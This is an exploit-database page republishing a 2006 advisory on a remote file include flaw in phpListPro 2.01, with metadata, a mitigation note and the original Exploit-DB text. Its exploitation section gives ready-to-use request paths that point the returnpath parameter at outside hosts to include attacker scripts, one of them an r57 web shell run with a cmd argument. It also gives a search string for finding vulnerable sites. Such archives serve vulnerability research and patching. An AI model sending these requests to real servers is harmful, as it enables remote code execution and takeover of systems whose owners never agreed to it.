phpListPro - exploit.company

vendor:

phpListPro

by:

Aesthetico

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: phpListPro

Affected Version From: 2.01

Affected Version To: 2.01

Patch Exists: YES

Related CWE: N/A

CPE: a:smartisoft:phplistpro

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

phpListPro <= 2.01 - Remote File Include Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the returnpath parameter. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of phpListPro or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

Title: phpListPro <= 2.01 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: SmartISoft
URL: http://smartisoft.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "PHPListPro ©2001-2006 SmartISoft"
-----------------------------------------------------------------

Exploitation:

/config.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF
/editsite.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF
/in.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF
/addsite.php?returnpath=http://mitglied.lycos.de/n0ssy/r57.txt?&cmd=ls

# milw0rm.com [2006-05-08]